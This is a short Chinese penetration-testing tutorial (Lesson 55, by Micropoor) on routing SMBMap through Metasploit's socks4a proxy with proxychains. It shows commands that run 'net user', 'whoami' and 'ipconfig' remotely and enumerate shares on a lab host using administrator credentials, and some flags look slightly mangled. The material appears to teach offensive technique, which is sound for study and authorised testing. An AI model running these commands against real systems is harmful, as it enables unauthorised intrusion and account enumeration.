第五十五课：与Smbmap结合攻击

msf 在配合其它框架攻击，可补充 msf 本身的不足以及强化攻击方式，优化攻击线路。本季将会把 msf 与 Smbmap 结合攻击。弥补 msf 文件搜索以及文件内容搜索的不足。

项目地址：https://github.com/ShawnDEvans/smbmap

• 支持传递哈希

• 文件上传/下载/删除

• 可枚举（可写共享，配合Metasploit）

• 远程命令执行

• 支持文件内容搜索

• 支持文件名匹配（可以自动下载）

• msf配合Smbmap攻击需要使用到sock4a模块

msf auxiliary(server/socks4a) > show options

该模块socks4a加入job

msf auxiliary(server/socks4a) > jobs

配置proxychains，做结合攻击铺垫。

root@John:/tmp# cat /etc/proxychains.conf

支持远程命令

root@John:/tmp\# proxychains smbmap ‐u administrator ‐p 123456 ‐d wordk group ‐H 192.168.1.115 ‐x 'net user'

root@John:/tmp# proxychains smbmap ‐u administrator ‐p 123456 ‐d wordk group ‐H 192.168.1.115 ‐x 'whoami'

枚举目标机共享

root@John:/tmp# proxychains smbmap ‐u administrator ‐p 123456 ‐d wordk group ‐H 192.168.1.115 ‐d ABC

root\@John:/tmp\# proxychains smbmap ‐u administrator ‐p 123456 ‐d wordk group ‐H 192.168.1.115 ‐x 'ipconfig'

Smbmap支持IP段的共享枚举，当然Smbmap还有更多强大的功能等待探索。

Micropoor